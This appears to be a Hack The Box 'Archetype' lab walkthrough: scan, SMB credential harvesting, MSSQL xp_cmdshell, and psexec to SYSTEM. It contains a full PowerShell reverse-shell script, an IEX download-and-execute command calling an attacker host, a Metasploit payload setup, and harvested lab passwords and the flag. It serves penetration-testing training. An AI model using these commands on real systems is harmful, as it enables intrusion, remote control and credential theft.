Archetype
HTB - Archetype
- 1.Scan with
nmap
:[email protected]:~$ nmap -T4 -A -p- 10.10.10.27Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-03 17:58 EDTNmap scan report for 10.10.10.27Host is up (0.042s latency).Not shown: 65480 closed ports, 43 filtered portsPORT STATE SERVICE VERSION135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM| ms-sql-ntlm-info:| Target_Name: ARCHETYPE| NetBIOS_Domain_Name: ARCHETYPE| NetBIOS_Computer_Name: ARCHETYPE| DNS_Domain_Name: Archetype| DNS_Computer_Name: Archetype|_ Product_Version: 10.0.17763| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback| Not valid before: 2020-05-03T17:16:49|_Not valid after: 2050-05-03T17:16:49|_ssl-date: 2020-05-03T22:15:41+00:00; +14m18s from scanner time.5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found49664/tcp open msrpc Microsoft Windows RPC49665/tcp open msrpc Microsoft Windows RPC49666/tcp open msrpc Microsoft Windows RPC49667/tcp open msrpc Microsoft Windows RPC49668/tcp open msrpc Microsoft Windows RPC49669/tcp open msrpc Microsoft Windows RPCService Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsHost script results:|_clock-skew: mean: 1h38m18s, deviation: 3h07m51s, median: 14m17s| ms-sql-info:| 10.10.10.27:1433:| Version:| name: Microsoft SQL Server 2017 RTM| number: 14.00.1000.00| Product: Microsoft SQL Server 2017| Service pack level: RTM| Post-SP patches applied: false|_ TCP port: 1433| smb-os-discovery:| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)| Computer name: Archetype| NetBIOS computer name: ARCHETYPE\x00| Workgroup: WORKGROUP\x00|_ System time: 2020-05-03T15:15:32-07:00| smb-security-mode:| account_used: guest| authentication_level: user| challenge_response: supported|_ message_signing: disabled (dangerous, but default)| smb2-security-mode:| 2.02:|_ Message signing enabled but not required| smb2-time:| date: 2020-05-03T22:15:33|_ start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 187.16 seconds - 2.Nessus scan for fun Start with
sudo /etc/init.d/nessusd start
and go tohttps://kali:8834
- 3.Samba is open so lets see is anonymous login enabled and list the sharessmbclient -L \\\\10.10.10.27\\anonymous (or use -N in above command for anonymous login)Result:
backups
directory foundSee insidebackups
:smbclient -N \\\\10.10.10.27\\backups
. There is a dtsConfig file, which is a config file used with SSIS:get prod.dtsConfigexitcat pro.dtsConfigConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>Result: Contains credientials for userARCHETYPE\sql_svc
with passwordM3g4c0rp123
. - 4.Target is running
Microsoft SQL Server 2017 14.00.1000.00
per thenmap
scan. Searching for exploit reveals Rapid 7 and HackTricks Book- HackTricks had command to gather info about the service:
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=ARCHETYPE\sql_svc,mssql.password=M3g4c0rp123,mssql.instance-name=ARCHETYPE -sV -p 1433 10.10.10.27
which was not helpful since it is similar to the-A
flag. - Attempt Metasploit exploit:sudo msfconsolesearch mssqluse exploit/windows/mssql/mssql_payloadoptionsset username sql_svcset password M3g4c0rp123set rhosts 10.10.10.27set USE_WINDOWS_AUTHENT trueset payload windows/meterpreter/reverse_tcpoptionsrunPossibly could use
set payload windows/shell_reverse_tcp
Failed. - Manual Exploit
- Let's try connecting to the SQL Server using Impacket's mssqlclient.py:
python3 mssqlclient.py ARCHETYPE/[email protected] -win
dows-auth` - We can use the
IS_SRVROLEMEMBER
function to reveal whether the current SQL user has sysadmin (highest level) privileges on the SQL Server. This is successful, and we do indeed have sysadmin privileges. This will allow us to enable xp_cmdshell and gain RCE on the host. Let's attempt this, by inputting the commands below.EXEC sp_configure 'Show Advanced Options', 1;reconfigure;sp_configure;EXEC sp_configure 'xp_cmdshell', 1reconfigure;xp_cmdshell "whoami" - Save following as
shell.ps1
:[email protected]:~$ cat shell.ps1 $client = New-Object System.Net.Sockets.TCPClient("10.10.15.117",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
- Next, stand up a mini webserver in order to host the file. We can use Python:
python3 -m http.server 80
- After standing up a netcat listener on port 443:
nc -lvnp 443
- We can now issue the command to download and execute the reverse shell through xp_cmdshell:
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.15.117/shell.ps1\");"
- A shell is received as sql_svc, and we can get the user.txt on their desktop.
- 5.Privilege Escalation
- As this is a normal user account as well as a service account, it is worth checking for frequently access files or executed commands. We can use the command below to access the PowerShell history file:
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Result:net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
- This reveals that the backups drive has been mapped using the local administrator credentials. We can use Impacket's psexec.py to gain a privileged shell.[email protected]:~/Downloads/impacket-0.9.21/examples$ python3 psexec.py [email protected]Impacket v0.9.21 - Copyright 2020 SecureAuth CorporationPassword: MEGACORP_4dm1n!![*] Requesting shares on 10.10.10.27.....[*] Found writable share ADMIN$[*] Uploading file tHaoJdVi.exe[*] Opening SVCManager on 10.10.10.27.....[*] Creating service JESk on 10.10.10.27.....[*] Starting service JESk.....[!] Press help for extra shell commandsMicrosoft Windows [Version 10.0.17763.107](c) 2018 Microsoft Corporation. All rights reserved.C:\Windows\system32>whoamint authority\system
- Get flagcd C:\Users\Administrator\Desktoptype root.txtb91ccec3305e98240082d4474b848528
Last modified 9mo ago